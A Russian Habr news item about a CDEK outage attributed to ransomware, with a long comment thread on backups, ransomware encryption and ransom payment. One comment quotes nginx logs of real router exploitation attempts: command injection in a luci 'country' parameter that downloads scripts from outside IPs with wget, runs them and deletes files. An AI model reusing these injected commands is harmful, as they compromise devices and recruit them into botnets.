Как стать автором
Обновить

СМИ: причиной продолжающегося сбоя в работе сервисов СДЭК может быть вирус-шифровальщик и хакерская атака

Время на прочтение3 мин
Количество просмотров120K
Всего голосов 17: ↑17 и ↓0+28
Комментарии294

Комментарии 294

Представитель Bi.Zone отказался от комментариев СМИ по этому инциденту - ну еще бы, лол.

Подозреваю, что журналисты даже и не пытались на него выйти. Поискали в сети контакты пресс-центра данной группы, закономерно не нашли и на том успокоились. Ни в даркнет не заходили, ни связи с отечественными хакерами/безопасниками не задействовали, чтобы через третьи руки получить контакт и взять интервью...

А зачем? Что это даст?

У вас карикатурное представление о работе электронных СМИ.

Ну а чего Вы хотите.. Думаете там люди штаны просиживают? Вы бы знали какие там потоки информации через них проходят.. и сколько.. "Мы с вами" бы уже давно с ума сошли.. Думаете все так просто, как нам кажется.. Человек не сделал поспешных выводов, и не озвучил предполагаемую информацию.. Что тут такого? По-моему все правильно сделал.. А то что Мир, все больше и больше зависит от ИТ, и электроники/микроэлектроники в частности.. Так это по-моему даже дураку уже понятно.. Как то так, на мой взгляд.. не принимайте на личности.. Спасибо

Мы точно на хабре, а не в разделе комментариев какого-нибудь локального СМИ?

"мы с вами" это кто? Взаимодействовал с Бизоном со стороны корпоративного клиента. Более тормознутого сервиса и абсолютного непонимания как что работает не встречал. После опыта cloudflare бизон воспринимался как тормозящая, мещающая нормальной работе прослойка. К сожалению, в определенных корпкругах есть требования использовать именно этот и никакой другой сервис. Вот такая "конкуретная" среда и "качественная" услуга.

Не знаю как сейчас, но 5 лет назад были довольно живенькими в части своих услуг.

во насовали.. (относится к моему комментарию выше).. Что не так то я сказал? Смотрите, все эти ИТ и "Ваши" технологии, да и КБ туда же (не Красно-Белое, а кибер безопасность).. Вы представляете сколь ко в этой сфере работает специалистов? Вы думаете туда прямо все по блату попадают?.. Поймите (от себя лично), это постоянное сопротивление двух сторон, добро и зло, если угодно.. инь и ян.. черное и белое и т.д.. Так будет всегда, одни ломают - другие защищаются, одни делают крутые экраны (фаерволы) - другие пытаются их сломать.. Это неумолимый процесс, и он никогда, никогда не прекратится..

Другое дело, что СДЭК, СДЭК Карл.. кому он н.. (две буквы н) нужен?.. Вот если только кто-то не хотел сорвать поставки чего-то, куда-то.. вот это другой вопрос..

Что не так:

Ну а чего Вы хотите.. Думаете там люди штаны просиживают? Вы бы знали какие там потоки информации через них проходят.. и сколько.. "Мы с вами" бы уже давно с ума сошли..

Это хабр, тут куча народу, которая не просто знает, что это за информация, но ее и генерирует, модерирует, обрабатывает. И эта куча народу прекрасно знает, как умеют просиживать штаны.

Думаете все так просто, как нам кажется..

Бритва Оккама говорит, что да, все максимально просто. Можно, конечно, предположить, что в серверную СДЭКа высадился космодесант, но смысла в этом особого нет.

Человек не сделал поспешных выводов, и не озвучил предполагаемую информацию.. Что тут такого? По-моему все правильно сделал..

Нет, это он сделал неправильно. Нет обратной связи, непонятно, нужно ли быть готовым к новым событиям, стоит ли переживать за посылки. Так работает связь с общественностью.

P.S. Ну и от себя - две точки в конце предложения - это странновато и режет глаз - точка или одна, или три, но это сугубо мое ИМХО.

Я не минусил, но откомменчу. Я больше привык к сокращению ИБ (информационная безопасность). Представляю сколько людей там работает и каким образом туда попадают. Инфобез и атаки - это бесконечный процесс, согласен. Но к этой конкретной компании вопросы по профильным компетенциям, по коммуникации с клиентами и по коммуникации в публичном поле.

Чем больше инфраструктура, тем больше нужно квалифицированного персонала из ИТ и ИБ. Но зачастую ТОПы эти услуги берут на аутсорс, т.к. прислушиваются к многочисленному числу шныряющих вокруг сейлов из интеграторов, которые ради продаж своих услуг что угодно наобещают и нарисуют. Хотя так им ТОПам СДЭКа и надо, с ними поступают так, как они поступают со своими клиентами - пренебрегают приватностью своих клиентов, отдавая их персональные данные налево и направо. Звонки из "службы безопасности" сразу после пользования их услугами не просто так.

Заглянул к ним в раздел "Новости" ?
Заглянул к ним в раздел "Новости" ?

Только это скрин к другой новости

Но в зависимости от уровня исполнения такие вирусы могут удалить и резервные копии

Если между бэкапами и сетью отсутствует воздушная прослойка... ну вы поняли ))

А как же тогда так называемый "ИБ-эксперт" будет по удаленке иммитировать информационную безопасность?

"безопасность" и "удаленка" в одной фразе, ага ))

рядом с йокодзунами мне всегда смешно

да не так уж и сложно, если на месте сидит петрушка с примитивной инструкцией "по расписанию вынуть отседова и положить в сейф, а если загорится красная лампочка, взять кувалду и расхреначить содержимое сейфа".
Мне казалось, что все это было обсосано до мозга костей еще в начале нулевых.

Попросили оформить в закупку лампочку для экстренного сигнала к уничтожению секретных данных.
...
Заказал смарт-лампу сяоми.
Хаккеры ломанули вместе с базами еще и лампочку и весело тебе подмигнули
...
профит)

В коммерции я и не такое видел - кейс киевского школьника, подломившего создателей Сталкер - оно как раз про эцсамое. Но я изнасилова... пардон, избалован общением с первым отделом, и только за одну попытку в защищенном помещении использовать что-то излучающее придут люди с незапоминающимися лицами и скучными цитатами из УК РФ прибавят седых волос. Поэтому ксиаоми эт хорошо коненчо же и удобно, но только дома - цену факапа с ликивдацией его последствий тоже надо уметь подсчитывать.

Тоже имел опыт работы с первым отделом, но в лайтовом режиме. Даже шкафчики стояли для телефонов, но всем было настолько на них плевать, что я даже удивился.

Шкафчики - это типовое для режимного предприятия. Или же вы имеете ввиду, что вам оформили не только 1 или 2-ю форму, но и зафиксировали ознакомление с гостайной, но пока вы с ней работали в защищенном помещении, мобилка находилась при вас?

зафиксировали ознакомление с гостайной, но пока вы с ней работали в защищенном помещении, мобилка находилась при вас?

вы ожидаете, что человек сейчас, выражаясь простонародно, себе "статью с пола поднимет"?

Ну статью он не поднял бы - пропесочили бы на месте и все. Для статьи надо было сфотать, вынести и все такое.
А и за теплые ламповые истории не привлекают (надеюсь, вы поняли, об чем я)

придут люди с незапоминающимися лицами и скучными цитатами из УК РФ прибавят седых волос

ну, в имитацию бурной деятельности они давно научились, этого не отнять

А это типичная ошибка выжившего - залетчики уже никому ничего не расскажут, а когда им представится такая возможность тема будет уже неактуальна и никому не интересна.
Дело Сафронова, к примеру.

Вы ещё дело одного там замминистра вспомните. Где они были эти восемь лет (с) пока он был в должности?

Разработка лиц такого ранга, сбор документов и свидетельств ведется годами, чтобы наспех заведенное дело не развалилось в суде под атакой высококвалифицированных авдокатов за хулиардбаксов каждый.
Ваш КО (мне казалось такое очевидным)
И замминистра не за гостайну взяли, есличо - каким вообще боком тут его случай?

а у вас отменное чувство юмора.
Разработка... давно так не смеялся

А вы любое дело с похожим бэкграундом откройте, там как бы не по нескольку десятков томов случается - правда думаете, что эти тома пустой бумагой следаки наполняют? Просто один поверхностный обыск - это где-то с десяток-три человекочасов, Наружка может вообще месяцами пахать и иногда - с нулевым выхлопом.

Безопасность системы определяется самым слабым звеном. Пока есть досуп к бекапу по удаленке никакие инструкции и охранники на местах особо не помогут.

Мне кажется, сейчас так в 90% мест и есть, в мало каких (критичных) местах ещё таскают физические бобины.

где-то вчера-позавчера в новостях мелькало, что продажи ленточек только растут и я знаю пару мест (госсектор), где сброс на них с последующим физическим перемещением на долгосрочное хранение очень даже практикуют.

ладно, не del

Телефоны отрубили в первый же час сбоя, до "земли" хоть какую-то информацию под конец второго дня спустили только. До этого сотрудникам пунктов выдачи приходилось отбиваться от истерик клиентов и манагеров, которые дозвониться наверх не могли.

Про вакансии девопсов с ИБ за 130к я и молчу. Результат прекрасного менеджмента (в том числе кадрового).

Телефоны отрубили в первый же час сбоя

вот бы изобрели такие телефоны, которые работают с инфраструктурой внешнего оператора, связываясь с его базовыми станциями по радио, тогда менеджмент мог бы записать номера друг друга и созвониться в экстренной ситуации

телеграмм нее?

У вас сарказмометр сломался.

Ох, спасибо! Смотрю на него и точно - Стрелка залипла.... пора в сервис! +)))

Телеграмм есть, на сайте ссылка открывается.

Сейчас тех что есть с дерьмом смешают и за ворота выставят.

Работникам ИТ теперь не при каких условиях нельзя в резюме СДЭК указывать.

Разрешу себе усомниться в высказываниях Дбара, послушав которого, может создасться впечатление, что 90% шифраторов всё еще начальный блок XOR-ят.

Согласен, диванный уровень экспертизы на лицо.

Дык директор — коммерческий, журналисты ещë бы в бухгалтерии спросили

"Продаю то, не знаю что, туда, не знаю куда."

главное деньги считать, а остальное не важно )

"Продаю {пофиг_что}, {пофиг_куда}"

- А по бумагам есть

Перефразируя известную комедию:

"Были бекапы, мы этого не отрицаем, но демоны на серверах их сами ликвидировали..."

во всем нужно искать плюсы: персональные данные надежно зашифрованы и никто их не сольет в очередной раз)

и бэкапы по всему интернету разложены

>> «Придется анализировать вирус, пытаться подобрать к нему ключ дешифровки. При этом не рекомендуется платить выкуп: вероятно, злоумышленники не дадут никаких ключей, а лишь посмеются, забрав ещё и деньги», — уточнил Дбар

Почему у них не нашлось ни одного человека, способного остановить его от произношения подобной глупости? Как будто кто то предлагал им выкуп...

А в целом эту контору не жалко - как они относятся к персональным данным, раздавая их другим коммерческим предприятиям не спросив разрешения, так и с их собственно данными обошлись. Ещё и за аморальное поведение в 2022 году карма прилетела...

Ладно бы ещё коммерческим. Одно время после отправки посылки через СДЭК звонила "служба безопасности банка".

Это правда, знакомый так же нарывался. Причем он указал свой номер телефона, но ФИО родственника - и скоро ему позвонили и назвали как раз по ФИО родственника.

"знает сдэк - знает и зэк", народная пословица

кстати, у газпромбанка аналогично

Зато удобно получающему. Как только служба безопасности позвонила в неурочное время - время идти за посылку. Эти орлы успевали еще до оповещений самого сдэка оповестить ;)

Как только служба безопасности позвонила в неурочное время

У Вас есть урочное время для таких звонков? О_о

с ударением на первый слог - У'рочное =)

Справедливости ради, отмечу, что в моем городе СДЭК, это почти что единственный вариант что то быстро отправить. Достаточно часто пользовался их сервисами и был приятно доволен скоростью доставки. Каких то масштабных сбоев не припомню до этого. Если что - Крым, небольшой город. DPD нет, Деловые линии в перде, ПЭК тоже нет. Есть Boxberry и Почта Крыма.

Интересное у вас представление о справедливости. Начальник тюрьмы, человек, конечно плохой, но других нет, поэтому молодец.

Странная аналогия. Что мешает "Почте россии", и другим ТК делать такой же сервис как у СДЭК? Пришли бы они в мой город и делали бы нормальные услуги - пользовался бы ими. А так, СДЭК это был лучший вариант из транспортных компаний по цене и качеству. Надеюсь они оправятся от этой проблемы и продолжат гонять мои посылочки как раньше. ЗЫ: минус не я вам поставил.

>> Что мешает "Почте россии", и другим ТК делать такой же сервис как у СДЭК?

Так к любому глобальному вопросу можно подойти. Вот в Северной Корее ни диктатура, просто "что мешает другому северокорейцу взять и стать главой государства, превратив его в демократический?". Или в Иране - "что мешает простому Иранцу прийти на смену тем, кто использует религию в целях контроля над обществом?".

Да также и вас могу спросить по идее - что мешает вам уехать с режимной территории, и пользоваться всеми благами свободной конкуренции?

PS: >> ЗЫ: минус не я вам поставил.

Можете и вы поставить, я здесь не для плюсиков-минусиков пишу и в публичном карма-нытье не участвую.

Суть мысли, как я её понял: СДЭК экономит на кибербезе (и возможно репутации, не в курсе) и за счёт этого предоставляет услуги, которые не могут предоставить конкуренты. Это необязательно правильный подход (что мы видим прямо сейчас), но, в целом, право на жизнь имеет.

Кому-то лучше дешёвый, быстрый и дырявый сервис, чем дорогой и надёжный. Каждый сам приоритеты расставляет.

Я предполагаю, что у них случилась проблема роста. За последнее время они вывели много новых сервисов и, скорее всего, чуть упустили инфраструктуру.

>> Кому-то лучше дешёвый, быстрый и дырявый сервис, чем дорогой и надёжный. Каждый сам приоритеты расставляет.

Увы, но иногда от подобной "медвежьей услуги" не отказаться... мои данные от СДЭКа именно так и утекли, что мне отправили посылку, когда я не знал каким видом доставки оно придет. И буквально сразу все мои персональные данные (необходимые для доставки) оказались в доступе у жуликов и воров, каким то нелепым образом имеющих легальный статус - Mail.ru... ну и судя по другим комментариям, много у кого еще, просто я не связал это тогда.

мои данные от СДЭКа именно так и утекли, что мне отправили посылку, когда я не знал каким видом доставки оно придет. И буквально сразу все мои персональные данные (необходимые для доставки) оказались в доступе у жуликов и воров

СДЕКу на получателя нужны только имя-фамилия и телефон (ну и адрес, если доставка курьером). Эти "персональные данные" вы до этого скрывали от интернета?

>> СДЕКу на получателя нужны только имя-фамилия и телефон (ну и адрес, если доставка курьером). Эти "персональные данные" вы до этого скрывали от интернета?

Восприму всерьез Ваш комментарий, если выставите свои (в том числе и перечисленные в скобках) данные публично в ответ на этот комментарий. Правда, если Вы это сделаете, я точно также перестану воспринимать Вас всерьез.

Вот это комбо.. ( 。⊙ ﹏ ˂ 。)

Снимаю шляпу :)

Hidden text

Хотя в данном случае проблема в привязке личных данных к относительно анонимному аккаунту на Хабре.

А что мешает ему выложить ПДн соседа и сказать, что это его? Тут фотка нужна с ноутом, на котором открыт профиль аккаунта Хабра :)

Как минимум прямая трансляция - в руках раскрытый паспорт, покрутить головой, коснуться носа рукой и тп. А то времена нынче суровые, фотки рисовать любой школоло умеет.

И карту, карту с 2 сторон сфотографировать!

А какая связь межу режимной территорией и нормальными сервисами? У меня город маленький, то что тут нет кучи сервисов - проблема не режимной территории. СДЭК пришел и сделал сервис, другие не сделали, но они есть в Симферополе и Севастополе, например. Такая же территория.
Что же касается "что мешает вам уехать с режимной территории" - да собственно ничего не мешает. Я просто не хочу. Мне тут нравится. Климат хороший, можно ходить в горы круглый год, тепло, вино и никаких проблем с ВНЖ, ПМЖ и тп.

Буквально неделю назад покупал на Авито ssd из центральной части РФ на Камчатку, доставка почтой России. Неделя, и SSD на Камчатке.

СДЭК может везти и 2 месяца легко, примеры к сожалению есть.

С почтой я стараюсь не связываться просто потому, что там происходит в отделениях. Был я недавно в Воронеже на почте, посылка с алика почему то пришла туда, а не в пункт выдачи пятерочки. Там хтонь и тоска. Не знаю как они там умудряются что то доставлять в срок, но там работают бабки, очереди на пол часа и хамство. Какой то мужик отправлял целый мешок посылок куда то, всекие выжившие из ума бабка, эти товары на полках как в сельпо. Плюс время работы отделений.

посылка с алика почему то пришла туда, а не в пункт выдачи пятерочки

Честно говоря, у меня доверия к ПР, при всем негативе в их сторону, куда больше, чем к кассирам в Пятерочке) Никогда не рисковал что-то получать через них.

Там сроки были на полторы недели меньше. Но не срослось.

С почтой я стараюсь не связываться просто потому, что там происходит в отделениях.

Сложно сказать, отражает ли это общую картину. У меня диаметрально противоположное впечатление о современной почте. Может зависит от города и отделения?

Но, в успешно работающий организации зависеть не должно. Если там в отделениях такое, то боюсь представить что там в скрытых от глаз местах. СДЭК тоже не молодцы. У них например напрочь игнорируется маркировка положения товара. Недавно пересылал спинку от кровати, сделали ей обрешетку, получилось надежно. Наклеили с каждой стороны наклейки с положением в котором надо везти. Но эти наклейки были проигнорированы, на обрешетки следы от подошв, то есть по ней просто ходили. Хорошо хоть от погрузчика нет следов.
У отца иконостас вообще проткнули вилами через обрешетку. Но, с другой стороны, кроме СДЭКа мне эту спинку никто бы не отправил. Почта бы ее не приняла в отделении, уж очень большая.

Ага, в следующий раз когда будете получать очередную посылочку с алика на кассе в пятерочке, имейте в виду, что вас проклинает вся очередь, которая пришла за продуктами на ужин, и вынуждена ждать несколько минут, пока кассир продуктового магазина занимается несвойственными ей функциями почтальона, выдавая посылки вместо сканирования продуктов.

Это в каких-таких пятёрочках посылки кассир выдаёт? Постаматы там обычно, и довольно далеко от кассы.

в отдалённых от москвы регионах теста ради посылки выдаёт кассир. Посылки хранятся в подсобке, к которой имеют доступ только кассиры.

Полагаю, кассиры невероятно рады доп. нагрузке, которая им привалила?

Года 3-4 назад и в Питере в Пятёрочке кассиры выдавали. Сейчас - постоматы.

Это мне, значит, с городом повезло (не Москва ни разу). Постаматы от cainiao где только не понатыканы.

Цайняо и пятерочка это разные способы доставки.

Мне, честно говоря, не очень интересно, как называются прокладки между условным али и покупателем, лишь бы товар доезжал вовремя и в целости.

Я как-то получал посылку на кассе в Перекрёстке. Там одна касса в частности такие посылки может выдавать. При этом есть и какой-то постамат внутри.

выдает кассир часто. и постамат стоит и кассир свой шкафчик открывает и там копается. и это не удаленный регион, а московская сеть "5"

Меня будет проклинать та часть очереди, которая имеет проблемы с построением причинно-следственных связей, так как те, у кого с этим проблем нет понимают, что я лишь пользуюсь рекламируемой услугой, а виноват в длительном ожидании кто-то из управления Пятерочки, решивший, что выдача на кассе лучше постомата, и проклинать надо его.

Если выдача товара делается быстро, то какая разница, получает человек посылку или покупает товар? Тут вопрос в том, как всё организовано. Если ящики с посылками за спиною у кассира (как было там, где я забирал посылку), то на обслуживание получателя может уйти намного меньше времени, чем на обслуживание обычного клиента с полной корзиной товара.

Вот именно, а меня проклинать не надо, не я придумал такую услугу, я ей пользуюсь.

Руководство Пятерочки далеко и обезличено, а задерживающий очередь злых голодных людей вот он рядом стоит! А вообще, я ещё и курильщиков проклинаю, которые долго сигареты на кассе выбирают, и тех кто наличкой расплачивается вместо карты. Хорошо, что кассы самообслуживания стали внедрять, теперь можно самому быстро всё пробить, сохранив запас проклятий для других случаев)

и тех кто наличкой расплачивается вместо карты

Или тех, у кого при попытке расплатиться картой всё виснет и приходится полчаса разбираться, ага.

Помнится до ковида были жаркие дискуссии на хабре. Кеш готовили умирать, оффлайн отделения банков готовили умирать, "зачем они есть же тинькофф".. первые же потрясения все расставили по своим местам.

И к слову, проблема сигарет на кассе не в клиентах, а в том, что чаще всего кассир не знает где искать нужную марку.

И время оплаты что кешем что картой чаще одинаковое, потому что в большинстве случаев деньги отдаешь еще до того как все собрал в пакет, и пока докладываешь последние покупки, кассир уже дает сдачу.

А вот когда карта не принимается или денег на ней не хватает или очередной самсунг (подставить нужное) пэй не работает - вот это регулярно и это реальная задержка всей очереди.

Вот прямо сегодня я с кучей мороженого в руках ждал терпеливо когда человек, у которого не хватило денег на оплату покупок, уходил к желтому банкомату и вносил туда наличные. Толи наличных не хватало на всю покупку, толи бонусы кешбеки он любит (не понятно только почему за счет моего личного времени).

Я тоже Почте в последнее время доверял, проблем не было, но после того, как в начале месяца две мои посылки по России почти три недели лежали в Столбище (известная история) и вместо недели, как обычно, пришли больше чем через месяц, а другую (из СПб) умудрились привезти в Москву, где я живу, на сортировку, потом зачем-то отправили в Рязань, потом в Тверь, и только потом снова в Москву (поддержка пояснила это "техническим сбоем"), мой кредит доверия слегка подисчерпался.

«Придется анализировать вирус, пытаться подобрать к нему ключ дешифровки. При этом не рекомендуется платить выкуп: вероятно, злоумышленники не дадут никаких ключей, а лишь посмеются, забрав ещё и деньги», — уточнил Дбар

Я, конечно, понимаю, что платить выкуп аморально, и только помогает преступникам. Но все случаи у наших клиентов, которые я лично знаю, где ловили шифровальщика почти всегда платили, и всегда им расшифровывали данные обратно. Тут как бы с той стороны преступники тоже понимают, что если они будут кидать, то им никто платить не будет, и заниматься этим им не будет смысл. Соответственно бизнес рассматривал это как плату за халатность, и потом уже все делал гораздо лучше.

Хотя были и те, кто пошел на принцип и не платил. В основном как раз те, кто делал нормально бэкапы и восстанавливал из них.

Да, это именно что он мало того, что произнес абсолютно некомпетентную в этих вопросах вещь (если не ошибаюсь, существуют даже страховки от подобного рода преступлений, когда страховая компания выплачивает хакерам деньги), дак еще и хотел представить её как "ответ на действия", собственную принципиальность подчеркнуть, при том, что подобного предложения им и не поступало. Это ответ максимально некомпетентного человека, за который любой уважающей себя компании было бы стыдно.

Если отдавать ключи для дешифровки не планируется, зачем вообще что-то шифровать, а не просто записать случайные байтики?

Маловероятно конечно, но было бы забавно, если после нескольких бессонных ночей расшифровки, наконец добились бы результата - и получили на выходе дешифрованные случайные байтики) такое вообще возможно?

PS: информационные безопасники, читающие этот комментарий be like:

Hidden text

Дешфировка неправильным ключом не может закончиться "ошибкой". Дешифровка может закончиться как раз случайными байтиками. Поэтому бессонные ночи не нужны, такой результат будет с первой попытки.

Может затем, что в случае шифрования, можно позже передумать и таки продать ключ дешифровки, а переписать мусором уже безвозвратное действие.

«Придется анализировать вирус, пытаться подобрать к нему ключ дешифровки. При этом не рекомендуется платить выкуп: вероятно, злоумышленники не дадут никаких ключей, а лишь посмеются, забрав ещё и деньги», — уточнил Дбар.

Зависит от вируса, могут и ассиметричное шифрование использовать, тогда не получится вытащить из бинарника ключ, либо могут AES использовать, но ключ потереть после шифрования. Мне кажется времена когда хакеры использовали простой XOR со статическим ключом в бинарнике прошли.

Зависит от вируса, могут и ассиметричное шифрование использовать, тогда не получится вытащить из бинарника ключ

Чем ассиметричное шифрование отличается от симметричного? В ассиметричном для шифрования используется такойже симметричный ключ

В симметричном шифровании одним ключом шифруют и дешифруют данные.
В ассиметричном шифровании вы не сможете расшифровать данные ключом, который использовался для шифровки. Панадобится другой ключ (закрытый).

Нет. И в симметричном, и в ассиметричном шифровании используется симметричный ключ. Просто в ассиметричном этот ключ дополнительно шифруется открытым ключем. Забавно объяснять это на хабре, да еще и минусы получать

Да в общем-то нет: вы просто путаете, как работает, какой-нибудь TLS (асимметричное шифрование используется только для обмена симметричным ключом, далее используется симметричное шифрование, ибо оно быстрее) и асимметричное шифрование само по себе, которое никакого симметричного ключа не требует

И как зашифровать данные без симметричного ключа?

Открытым ключом пары вестимо. Расшифровывать потом закрытым. Ну то есть тот же TLS как делает: клиент генерирует сеансовый симметричный ключ, берет открытый ключ из сертификата сервера, шифрует сеансовый этим ключом и отправляет на сервер. Но можно же зашифровать не сеансовый ключ, а произвольные данные

Ну так я так и пишу. А кто шифрует произвольные данные? Есть такой протокол, который шифрует публичным ключем?

В любом случае, в целях вируса-шифратора, тем более непонятно, зачем нужен приватный/публичный ключ

 Есть такой протокол, который шифрует публичным ключем?

А зачем вам протокол? в вирусе вы можете хоть все вручную написать, благо RSA доступен для реализации даже студенту. А зачем понятно: в самом вирусе у вас будет только публичный ключ, а дешифровщик , в котором закрытый, будете давать за деньги, и никак анализом вируса дешифратор создать не удастся

Только это жутко медленно. Проще сгенерить симметричный ключ прямо на девайсе, отправить его куда-нибудь в сеть (можно и в зашифрованном открытым ключом виде) и дальше спокойненько шифровать всё на диске

Ну это будет быстрее, но не проще. Ну и плюс появляется потенциальная дыра - этот отправляемый в сеть ключ можно перехватить, или из логов трафика вытащить (мало-ли кто что там хранит и сколько)

Если симметричный ключ был зашифрован при помощи ассиметричной криптографии, то перехватывать там особо нечего :)

Скорее всего делается просто, рандомно генерится клочь для AES, тут же шифруется публичным ключом и сохраняется где угодно зашифрованном в реестре, файле и пр, и дальше идет шифрование через AES

Это делается из-за вопроса скорости. Симметричное шифрование просто гораздо быстрее.

НЛО прилетело и опубликовало эту надпись здесь

RTFM.
Ладно, уж, распишу по-простому.

Для расшифровки нужен другой ключ. Всего-лишь.
Т.е. ты раздаешь публичный ключ, по которому шифруют для тебя, и никто после шифрации, имея публичный ключ, расшифровать не сможет.
А расшифровываешь ты своим, закрытым ключом, парным к публичному.

Но, насколько мне известны истории с вирусами-шифровальщиками, там в основном было просто преобразование данных в мусор. Т.е. расшифровки и не предполагалось.

Если нельзя будет продать ключ для расшифровки того, что зашифровал вирус, то большой выгоды от вирусов-шифровальщиков для их создателей не будет, потому что перестанут верить, что можно купить ключ и вернуть свои данные.

Есть вирусы-шифровальщики, которые по той или иной причине действительно шифруют так, что данные расшифровать уже нельзя, но так действуют не все вирусы данного класса.

Делать какие-то конкретные выводы в данной ситуации бессмысленно ибо данных недостаточно.

так и было. часть получало ключ и по для расшифровки, а у большей части это или не получилось или отправив деньги в виде биткоинов, они в лучшем случае получали поздравительную открытку.

Обычно, есть возможность предварительно отправить некоторое количество зашифрованных файлов, и получить назад расшифрованные, для подтверждения наличия ключа. Затем уже происходит оплата. Это бизнес, ничего личного так сказать. А просто данные попортить, этим школьники какие-нибудь, возможно, занимаются. Но в компанию такого уровня вряд ли они зайдут.

Вся суть ассиметричного шифрования в том что бы были разные ключи для шифрования и расшифрования данных. И невозможность (за разумное время) по публичному ключу определить приватный.

Да уж, при наплевательском отношении к резервированию данных неудивительно. Хотя казалось бы, контора небедная - ну поставьте вы нормальную ленточную библиотеку, и несколько раз в день делайте инкрементальные бэкапы. А ленточки - в сейф в спецотделе под роспись замшелого майора в отставке, который к нему никого, кроме лично директора - не подпустит. ;)

Если нет денег на LTO, хотя бы пару приводов BlueRay и писать по диску в день, не думаю, что у CDEK больше десятка гигабайт критичных данных в день возникает.

Главное, чтобы бэкап был, и был offline, а еще лучше offsite. 3-2-1 пока никто не отменял.

Бекапы данных и рабочая инфраструктура это разные вещи.

Данные может и сохранились а запустить все с нуля на чистой среде, та еще задачка.

Кстати, да, сейчас, помимо самих данных, необходимо иметь и "чистую среду разворачивания". т.е. исходные сборки системы, без данных.

Так это подразумевается само собой. Актуальные образы систем из продакшена, актуальные настройки всего сетевого оборудования. Что-то поменял - создай образ и сбрось в хранилище.

Но это же культуру надо иметь :(

как вам поможет полный откат всех данных по посылкам которые идут иногда всего один день?
и потом вирусы иногда пишут на заказ. как с центрифугами для урана.
так что логично могли придумать чтото что портит бэкапы в момент их создания перед записью.

Логи транзакций можно хоть практически онлайн лить на ленту, хоть слать шифрованными по почте на ящик в Аргентине. ;)

Про настолько глубокую проработку, что обеспечить порчу бэкапов в момент их создания - явно без инсайдера с хорошим доступом и знанием внутренней структуры не обойдешься, а в таком случае ничего не поможет.

Главное, чтобы сейчас те сисадмины, кто этот пост и комментарии читают - примерили всё на себя, и подумали - а что я буду делать в таком случае?

молиться и готовиться к запасному аэродрому.

потому что доказать руководству необходимость бэкапа, дополнительного железа, ещё кучу гемороя с настройкой и поддержанием всего цикла жизни...

Тогда упс, пока гром не грянет, мужик не перекрестится... Потому как софт нонче дырявый до безобразия, сотрудники обычно тоже знанием ИБ не блещут - только вопрос времени и везения, когда поломают.

Даже в домашних вопросах это актуально - держал раньше свой сайт на джумле, типа модно, удобно... Достали ломать скрипткидди - вроде все апдейты ставишь, за новостями следишь - а потом смотришь аудитором - новые файлики откуда-то появились с шеллами, в базе непотребство творится.

В итоге плюнул, переделал на статику и добавляю материалы вручную по необходимости. в логах по прежнему куча попыток поломать - но ломать уже практически нечего.

Вот такое вот сплошным потоком...

2024/05/26 19:50:42 [error] 561#0: *23898 open() "/opt/share/nginx/html/owa/auth/x.js" failed (2: No such file or directory), client: 52.160.33.173, server:, request: "GET /owa/auth/x.js HTTP/1.1", host:

 2024/05/26 20:19:46 [error] 561#0: *23916 open() "/opt/share/nginx/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 31.220.1.83, server:, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=(id%3E%60wget+http%3A%2F%2F103.163.215.239%2Ft+-O-+|+sh%60)"

 2024/05/26 20:58:20 [error] 561#0: *23925 open() "/opt/share/nginx/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 84.54.51.37, server:  request: "GET /cgi-bin/luci/;stok=/localeform=country&operation=write&country=(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F147.78.103.177%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)"

 2024/05/26 21:34:07 [error] 561#0: *23927 open() "/opt/share/nginx/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 149.50.110.239, server: request: "GET /cgi-bin/luci/;stok=/localeform=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F147.78.103.234%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1"

на открытом сайте в современных условиях без WAF жизни не будет - затрахают. для апача быстро и недорого mod_security2 (статья по установлке и настройке была на хабре), для nginx не знаю, сам ищу. есть и платные решения.

Теперь руководству можно сказать: Вы что, хотите как в СДЭК?

Конечно надо, а еще тренировки проводить. Но тут, видимо, было "и так сойдет".

главное, чтобы эти тренировки/учения не переросли в реальную катастрофу.

Кроме того данные явно не самые новые и туда каким то образом надо будет внести десятки тысяч операций которые произошли со времен бекапа ( выдача товара, приемка итд), мало того 100% есть операции которые произошли уже после смерти системы, те же курьеры выдавали посылки, фуры привозили посылки на склады итд. ]

Интегрировать такие обьемы данных это отдельная нетривиальная задача. Cдеку можно пожелать только удачи, ну и нормально платить своему it Стафу.

А ещё, вычистить эту самую среду и найти точку входа. Если верить Х, прошлые их "клиенты", телеком какой-то, ушли на вторую серию после восстановления, правда пока "сами об этом не знают".

Главное, чтобы бэкап был, и был offline, а еще лучше offsite. 3-2-1 пока никто не отменял.

Я, если честно, не представляю, как им грамотно организовать бэкапы за разумную цену и с разумной периодичностью. Там же непрерывно миллионы отправлений принимаются, отправляются, сортируются, оплачиваются, выдаются, передаются курьерам и т.п., и любой бэкап безнадежно устареет буквально в течение часа

У каждой добавленной или изменённой записи устанавливать признак необходимости бэкапа.

По этим признакам и выбирать во всех таблицах записи для постоянного частого переноса в копию базы.

Эту копию базы часть бэкапить.

Бэкапятся логи транзакций, т.е. "кусочки" изменений в базе данных.

Ежедневный снапшот всей активной базы (в активной части должны бы быть только посылки в работе, после выдачи - перенос в отдельную архивную базу). А по активной базе регулярно берем логи и отправляем в оффлайн, можно хоть каждую минуту.

Для особых параноиков можно контролировать формат поступающих логов на бэкап-сервере, если пошли нетипичные данные (пошифровали демоны или троян перехватил задачу и шлет мусор) - алерт и всех на уши. И бэкап-сервер должен быть настроен так, чтобы связь была чисто односторонней (что угодно, хоть пошлая электронная почта).

PS: Если что, я так делал - только объемы были на 2-3 порядка меньше, поэтому логи уходили 2 раза в день - вечером и около обеда. (пользовались Sybase SQL server + Anywhere)

Всё происходящее (выдача посылки, прием посылки, оплата, ...) представляется как большой поток событий.

Этот поток событий можно эффективно бекапить хоть в реальном времени, пересылая его бекап-серверу, хоть по таймеру, зная, что последний раз ты видел событие номер N, а значит, в следующий раз надо выбирать все, что с номером больше N.

